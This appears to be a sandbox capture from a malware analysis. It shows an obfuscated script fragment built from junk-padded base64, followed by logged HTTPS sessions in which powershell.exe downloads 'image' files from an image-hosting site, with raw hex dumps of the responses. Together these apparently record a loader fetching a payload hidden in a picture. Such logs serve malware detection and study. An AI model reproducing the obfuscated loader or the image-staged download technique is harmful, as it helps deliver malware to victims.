CDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTre" & bexigal & achavascado & bexigal & "QBzDgTreCDgTreDgTrePQDgTregDgTreFsDgT
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 74 44 67 54 72 65 47 49 44 67 54 72 65 62 44 67 54 72 65 42 35 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 56 44 67 54 72 65 42 35 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 44 67 54 72 65 6f 44 67 54 72 65 43 63 44 67 54 72 65 55 44 67 54 72 65 42 53 44 67 54 72 65 45 38 44 67 54 72 65 53 67 42 46 44 67 54 72 65 46 51 44 67 54 72 65 54 77 42 42 44 67 54 72 65 46 55 44 67 54 72 65 56 44 67 54 72 65 42 50 44 67 54 72 65 45 30 44 67 54 72 65 51 51 42 44 44 67 54 72 65 Data Ascii: re" & bexigal & achavascado & bexigal & "QBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTre" & bexigal & achavascado & bexigal & "QDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTre
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 63 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 64 67 42 68 44 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 77 44 67 54 72 65 4a 77 42 42 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 55 44 67 54 72 65 42 79 44 67 54 72 Data Ascii: gTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTre" & bexigal & achavascado & bexigal & "DgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTre" & bexigal & achavascado & bexigal & "DgTreBJDgTreG4DgTreUDgTreByDgTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.45.138	443	3744	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 04:54:12 UTC	120	OUT	GET /images/004/760/043/full/new_image.jpg?1711287887 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-24 04:54:12 UTC	836	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 04:54:12 GMT Content-Type: image/jpeg Content-Length: 118736 Connection: close Cache-Control: public, max-age=31536000 Content-Disposition: inline; filename="new_image.jpg" Expires: Sun, 31 Mar 2024 14:09:54 GMT X-Request-Id: VhtzpCqlsJ85aNMjBRH78 X-Cache-Status: HIT CF-Cache-Status: HIT Age: 2043757 Last-Modified: Sun, 31 Mar 2024 13:11:35 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JI%2FVK2%2BqAUxgQxG047nCtOaVy04AYgfC0ngIlD2AmN3ENcSfeMm%2F2l3SXYqa9j1MAPCDXvwrkVTkCncADGPCOeDpNhazIz%2F9ZyApnu7tPFWNiuaXt81Sg23NafLWUkJ3WxWgbzziAkUd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87937e788b307ca7-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 04:54:12 UTC	533	IN	Data Raw: ff d8 ff e1 00 bc 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 d4 03 00 00 03 a0 04 00 01 00 00 00 27 02 00 00 00 00 00 00 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d Data Ascii: ExifIIV^(ifHH02100100'C%# , #&'))-0-
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: ad a5 71 ba ec 76 a7 d7 97 24 c6 c9 39 04 b7 0d e9 e9 4a 24 83 56 08 19 3f 2a 08 22 94 97 03 76 27 de 8e 9a 5c 32 a6 07 94 0a 85 2d 55 8e 24 19 07 60 ab c7 d7 d6 a6 91 40 73 92 7e 94 1c 89 dc 92 34 8c 7a e7 8a 92 29 1c ee 71 a4 d4 76 d6 cd 3c e9 1c 79 2c c4 28 1f 3a b2 43 f0 c5 eb 85 12 18 a3 1c e4 b1 3f 4d a8 13 6b 01 72 70 08 db 6a e2 37 74 e2 46 2a 4e 42 ff 00 97 db de 9e cf f0 8d c4 4a cd 6f 70 1f b9 52 08 c9 f9 d6 0f 86 2e 32 7f 6d 0a 8c 73 83 b1 a0 42 b2 1d 67 63 a7 3f 95 01 d5 2e ee 0e 98 ed db 48 c6 75 0e 4d 5b e5 f8 62 67 8d 51 66 4d f6 72 41 18 fe a2 95 8f 87 3a 97 8f e0 b4 0b a1 06 ce 48 29 8e 36 fe 94 0a 6c ee a6 93 22 52 0c a0 6e 40 c0 23 fa d7 6e c5 8e 5a a4 b2 e9 52 fd ee ed 75 29 36 de 5d 2a 72 ce 73 81 b7 f7 c5 1d 07 47 b8 9e 3f 13 54 51 Data Ascii: qv$9J$V?"v'\2-U$`@s~4z)qv<y,(:C?Mkrpj7tFNBJopR.2msBgc?.HuM[bgQfMrA:H)6l"Rn@#nZRu)6]*rsG?TQ
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: 71 6f 22 99 9b 50 1e 57 dd 7d 08 07 f5 af 12 33 40 2d e7 11 c9 2e a6 04 01 83 93 b7 7a bb 7d 9c 7c 55 73 d1 ba 0f 53 8f a6 4a 22 b8 9f c3 f1 1a 48 c3 82 c0 36 39 f9 d0 7a d7 c5 16 dd 5e f6 ee de c2 d4 c7 1f 4b 95 f1 7a e0 90 ed 1f 3a 47 b1 e0 fc e9 17 52 9d 2d ac 7e 37 82 02 d6 f0 c7 77 66 17 c3 c6 14 2c 11 8c 01 ed 8a af d8 7c 7b d7 5a de 36 ea 32 44 66 24 86 61 10 3a bd 08 c7 15 5a ea ff 00 14 df 5c 47 f1 16 19 63 fb ec b6 ed 20 f0 fb aa 28 18 f4 e2 82 e1 7b f0 b5 8f 5b f8 df a6 c7 20 f0 ad e2 e9 51 5d 34 48 3c b2 9d 78 c3 7e 75 e9 a9 79 3d bd 8b ad ac 7e 32 c4 b8 48 c3 60 10 3b 0a f0 cb 7f 8a fa 8c 1f 12 59 5d 44 d1 eb 3d 31 61 c8 8f 60 a0 8c 6d f4 c5 3e b5 f8 e3 ad 2c 0c 63 8a 12 c5 f9 11 81 b5 07 b1 c3 7f 2b 69 02 4c 9c 6f 9d f1 51 df 5f dc 09 2d 88 Data Ascii: qo"PW}3@-.z}\|UsSJ"H69z^Kz:GR-~7wf,\|{Z62Df$a:Z\Gc ({[ Q]4H<x~uy=~2H`;Y]D=1a`m>,c+iLoQ_-
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: 85 ed 4e 6c 7a d5 cc 11 3e 7c 29 1d 87 90 94 07 4f e9 41 6a 85 2d a2 80 f8 b3 eb 24 86 db 23 7d fc bf c2 85 bd 16 e6 36 96 39 c6 72 3f 66 3b fa fd 07 d6 95 ff 00 8e dc ac 83 75 11 32 91 a7 c1 52 55 b8 cf 1f 5a 05 ba b5 da 4a 57 c4 8c 6e 09 3e 0a 93 8f ca 80 bb b7 92 35 13 c5 a5 88 3b 8c f2 28 7b 79 66 8d 84 4b 2b 2b ee 52 39 5b ca e0 8e cd 50 b7 53 9a 51 29 f2 19 1d c8 de 30 34 8f a7 f7 f3 a0 24 9a e0 43 e1 36 97 42 75 04 2b c1 f6 a0 d3 34 a2 f7 c4 91 4c 72 23 00 55 36 60 71 c8 15 64 b7 ff 00 9a 82 16 90 b2 b0 3a b4 e7 7c fb ff 00 4a ab c9 2c c1 53 5e 48 5f c3 a8 6e 07 ce b6 f7 d7 0c 81 4b 93 83 e9 fa fc e8 1e f5 1b 22 d3 24 96 d8 8e 4e 75 46 30 73 df 3e d4 9e 58 a5 6b 87 73 1f 82 f9 21 82 8f 2f bf ca a4 b3 ea 17 73 4e 91 6b 53 e9 91 8e 29 c5 d0 b9 30 39 Data Ascii: Nlz>\|)OAj-$#}69r?f;u2RUZJWn>5;({yfK++R9[PSQ)04$C6Bu+4Lr#U6`qd:\|J,S^H_nK"$NuF0s>Xks!/sNkS)09
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: 24 96 ed 73 22 c8 8c a4 65 70 3c bf 4c 7f 1a 06 96 97 4b 3d d4 90 88 ee 21 96 30 09 f1 13 03 7e 30 73 bd 0b f1 1d 93 5c da c9 37 88 ea 60 46 3e 53 f8 c1 c6 41 f6 da b3 a2 41 79 6f 72 e9 71 74 2f 2c ca 12 92 e4 79 48 3c 66 99 f5 28 4c 9d 2a e4 2b 2e 0a 1c ee 3f 8d 07 9e 3d ab bb 12 ce 00 03 ca 0e 4e 07 a6 6b 42 06 7b 63 1e 98 a3 18 21 99 77 2e 09 c8 ce 78 c6 29 c3 59 ce 8a cc 63 6d 03 db 39 f9 62 84 9a 12 63 26 35 00 9f 2e 47 6c fb 50 0d 67 2c 50 db f8 73 d9 da 39 53 92 1a 32 4f e7 9d e8 1b 94 8c cd 27 84 3c 2d ff 00 e9 c6 0b 28 fa fa 53 88 16 dc e8 f1 86 a6 18 07 03 1b f7 15 39 b5 8e 38 72 ea e1 d9 c1 04 1f dd f4 f9 d0 55 09 d1 e5 2d 8c 9e 6b 99 a5 90 20 4c 91 fc ea d3 79 67 6d 24 00 24 0e c4 12 41 1e 99 ff 00 7a 55 73 d3 a5 9a e3 fe 46 06 54 51 fb e3 19 Data Ascii: $s"ep<LK=!0~0s\7`F>SAAyorqt/,yH<f(L*+.?=NkB{c!w.x)Ycm9bc&5.GlPg,Ps9S2O'<-(S98rU-k Lygm$$AzUsFTQ
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: f8 ce e4 0e 32 19 79 07 d6 8b bd 64 86 22 91 ae a6 52 02 14 39 20 1e 73 b5 04 d2 96 5b 69 20 02 44 c9 d5 be c4 7a d0 37 b5 b4 59 23 79 4e 58 ae c0 67 83 eb 42 cb a4 68 31 af e3 6f 37 b5 6a 6e b0 dd 3f a5 48 f2 af 9c 7e 14 51 96 c7 bf a5 21 5f 8a 2d 56 42 de 0c 84 1e 54 7f 1a 07 9d 52 35 3e 7d 00 33 0e 01 c6 00 e6 84 b8 b6 28 53 51 ca 91 c9 3b 7d 6a 38 3a a4 5d 43 c5 9a 29 4f 8b 90 3c 37 d8 fb ed 47 39 f1 e3 21 0e a4 43 b9 23 18 c5 02 88 94 7d fd b2 9a bb f3 80 68 b3 6d 10 bb 52 02 bc 4c 71 b6 dc e4 9d 8d 64 b7 36 89 d4 56 3d 1e 2e a5 1e 64 db 4f f7 9a 9f c0 92 41 a6 28 34 30 05 81 27 27 e7 9a 00 26 81 60 b9 f0 d3 22 37 3b 2f 61 52 3b 14 66 c0 d9 54 65 89 f5 a3 a5 88 cf 12 cb 30 50 ea b9 27 3c 9f 51 40 dd 59 45 78 af ac 9c 46 01 24 1c 77 a0 1c 5d 22 eb f1 Data Ascii: 2yd"R9 s[i Dz7Y#yNXgBh1o7jn?H~Q!_-VBTR5>}3(SQ;}j8:]C)O<7G9!C#}hmRLqd6V=.dOA(40''&`"7;/aR;fTe0P'<Q@YExF$w]"
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: f4 fe 15 5a 50 3f d2 9c d9 5a c4 f1 2f 84 5a 46 3f 88 2b 63 03 eb 40 d2 68 5d 84 4e 8f a9 70 58 32 ec 31 fc e8 7e 91 31 8b a9 99 a4 1e 66 04 00 bb 83 db 14 4d 8c 40 5a ac 52 ac b1 c9 16 57 d7 6d 8d 41 6d 6d 24 9a 02 02 a3 25 94 0e ff 00 33 41 25 eb 96 d6 c0 8f 3f 38 d8 e4 1e f4 bd dd c9 54 83 0a e4 e4 e4 e0 7c ea 76 51 14 85 a6 65 0c df 88 1a 96 d6 de 32 8c e5 86 90 db 6f 9c fe 94 13 a4 02 48 41 2c b8 55 c1 2a 0d 27 ca 6b 75 60 b9 04 90 0e c3 da ac 09 6c 44 6b 1a 6c 5b 2a 47 24 0f 5a ae cf 6d e1 de 22 e1 4e 39 d5 9c 7d 68 39 6b 34 9d 8b ae 51 7b 02 41 ac a3 ed ca ac 2b a5 57 07 7d f6 c7 d2 b2 83 d2 ae 11 55 46 0f 6e 45 2d 93 f1 02 0e 08 a6 97 d1 80 14 6b c1 f6 a1 18 01 c6 e0 0f ad 00 b2 26 a1 83 ab 18 e4 d7 76 c7 c3 1a 5b 25 49 e7 d2 bb 20 e4 8e 7d 2b 5a Data Ascii: ZP?Z/ZF?+c@h]NpX21~1fM@ZRWmAmm$%3A%?8T\|vQe2oHA,U'ku`lDkl[G$Zm"N9}h9k4Q{A+W}UFnE-k&v[%I }+Z
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: 8a ec 96 89 a7 cc 5c fe 10 30 00 0b be 6b 99 7f 69 72 1b 5a b0 19 19 0d b8 dc 71 53 f4 18 98 74 e0 c5 02 8c 67 1c d2 fb 99 a2 82 fb 0b 0a 98 cb 69 66 ce 73 9c 7f 5a 02 6e 71 31 60 a7 28 71 91 8e f4 a6 d1 26 17 71 88 5f 12 2e 7f 18 d8 8c 71 fa 53 cb 85 55 8d 64 2a 23 d8 12 73 c5 25 b7 91 fc 71 2d 9c 46 47 dc 69 e0 77 c7 e9 fc 28 25 ea 36 b1 fd dc ca f1 b4 37 20 e5 55 58 b6 4d 0b 6d d4 6e 60 b8 76 62 85 8b 79 b6 dc 91 4f ad 2d cc 6a 24 79 4c 92 be ec 48 e3 d8 7a 0a 0b e2 14 4f ba 78 8a 8a 19 9c 64 8d 8f 06 80 63 d5 0c 8a 0b a4 47 d3 e9 59 79 d4 e1 11 88 e2 4d 2c 37 d6 b9 15 1d 91 11 d8 5c 39 4c a1 2a a4 91 de ba b2 87 ef 57 07 28 1c 46 33 a5 93 48 df b7 e9 41 cd bd ce b6 47 92 77 48 4e ad 81 c6 f5 bd 71 4b 6c c0 c8 64 96 34 6f c4 7b 76 23 f9 d3 03 62 6e 70 Data Ascii: \0kirZqStgifsZnq1`(q&q_.qSUd#s%q-FGiw(%67 UXMmn`vbyO-j$yLHzOxdcGYyM,7\9LW(F3HAGwHNqKld4o{v#bnp
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: 61 8f b8 a0 2a ef e2 09 3a 8f c3 37 23 ee 46 37 82 e2 29 34 a9 25 42 9d 4a 5b 73 9e ea 0f 3d b8 e2 91 dc de 33 22 2c 41 51 ca 69 24 b7 f7 ef f9 d1 f6 70 42 9d 27 ab 4d 69 72 f2 46 62 85 5a 37 4d 24 1f 14 60 8d ce 76 a1 ec fa b5 d5 9c 1e 15 bb 47 85 39 c3 c0 8f cf fe 40 9c 50 0f 77 78 49 0e f6 b1 e6 43 82 57 3e 52 70 0f b7 03 1f 53 4b ae 25 91 22 79 22 01 57 27 4e ad fd b6 fa 0f d6 ac ff 00 10 ad bd b4 08 b1 45 a2 2b b8 21 bb 10 85 04 ab 6e 0a e7 9d 20 82 40 ce c0 d2 d9 6c e1 82 cc 1e ad 1b db 48 74 8f 03 00 ca 57 3f 88 2f ee ff 00 f5 62 83 ab 44 92 7b 75 95 da 17 43 13 15 71 26 5b 59 c0 c6 06 e3 00 9a e2 79 44 89 04 a8 55 19 8b ae 55 76 04 8d 8f e5 b7 af 7a 75 d1 ff 00 c1 ac ba 4d dc f1 da 97 b7 99 0c 2a d2 4d aa 42 cc 99 03 03 00 10 49 c8 f6 f7 de 7b ff Data Ascii: a:7#F7)4%BJ[s=3",AQi$pB'MirFbZ7M$`vG9@PwxICW>RpSK%"y"W'NE+!n @lHtW?/bD{uCq&[YyDUUvzuMMBI{
2024-04-24 04:54:12 UTC	1369	IN	Data Raw: cb 6f 6d 6e 90 44 9b 85 4b 6d 3f 99 c6 e7 de ad 10 75 24 95 c9 8e fa 16 02 52 14 89 82 85 f3 e7 70 4f 1a 7e 75 a8 5e e1 d3 51 b9 32 20 c0 1f b6 0d fb e0 9e fc e3 23 e4 28 3c fb e2 08 25 bb 86 e2 59 e1 65 94 9d 6c 7c 32 35 62 95 c5 75 23 dc db 2c a9 11 64 64 19 54 c7 06 bd 37 e2 a4 3f e0 ee c3 56 72 83 7f 9d 79 84 2e 8b 7e 04 a5 73 e3 ef 81 e6 3c 63 1f 5a 0d 7f 8c df 41 29 92 db ee e8 58 ea 27 c2 1f 97 cb da ba 6f 89 fa a8 4d 29 34 00 1d 88 f0 45 40 66 b4 8c 3e 10 39 19 51 91 9c fb ef b6 fb fe 54 bf c1 32 b9 f0 c6 39 38 ec 07 cf d0 50 58 ac 7e 21 ea 47 a5 bb 03 10 90 dd 2c 40 f8 60 80 19 49 c0 1f 4a 93 a9 75 9b ff 00 be 4e ac f6 e9 6e 1d e3 5d 71 82 4a 8d 8e 07 27 22 97 74 a9 62 86 34 8c 48 85 e2 bb 82 52 ec 30 31 9d 27 1e b8 c8 df 1f c2 95 dc 19 45 e4 e6 Data Ascii: omnDKm?u$RpO~u^Q2 #(<%Yel\|25bu#,ddT7?Vry.~s<cZA)X'oM)4E@f>9QT298PX~!G,@`IJuNn]qJ'"tb4HR01'E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.45.138	443	3744	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 04:54:13 UTC	100	OUT	GET /images/004/760/044/original/new_image.jpg?1711287888 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-24 04:54:13 UTC	702	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 04:54:13 GMT Content-Type: image/jpeg Content-Length: 4199045 Connection: close Last-Modified: Sun, 24 Mar 2024 13:44:48 GMT ETag: "66002e50-401285" Cache-Control: max-age=2678400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kF6R0WSVoJ8YrOAvya0p3w5rMt7DTIMJ%2B%2F%2FQx%2FbcliIlPx%2FFRtnafd5lYwKxC06rOXwTXUeFthAcjEaIL%2Fh74oSSRF1SVDLvV8IPD5vhYd%2FrzQS9KqEmunji4amWHCZCdGH%2BRh5NPFpy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87937e7e2914dbd1-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 04:54:13 UTC	667	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: d5 d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: c3 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
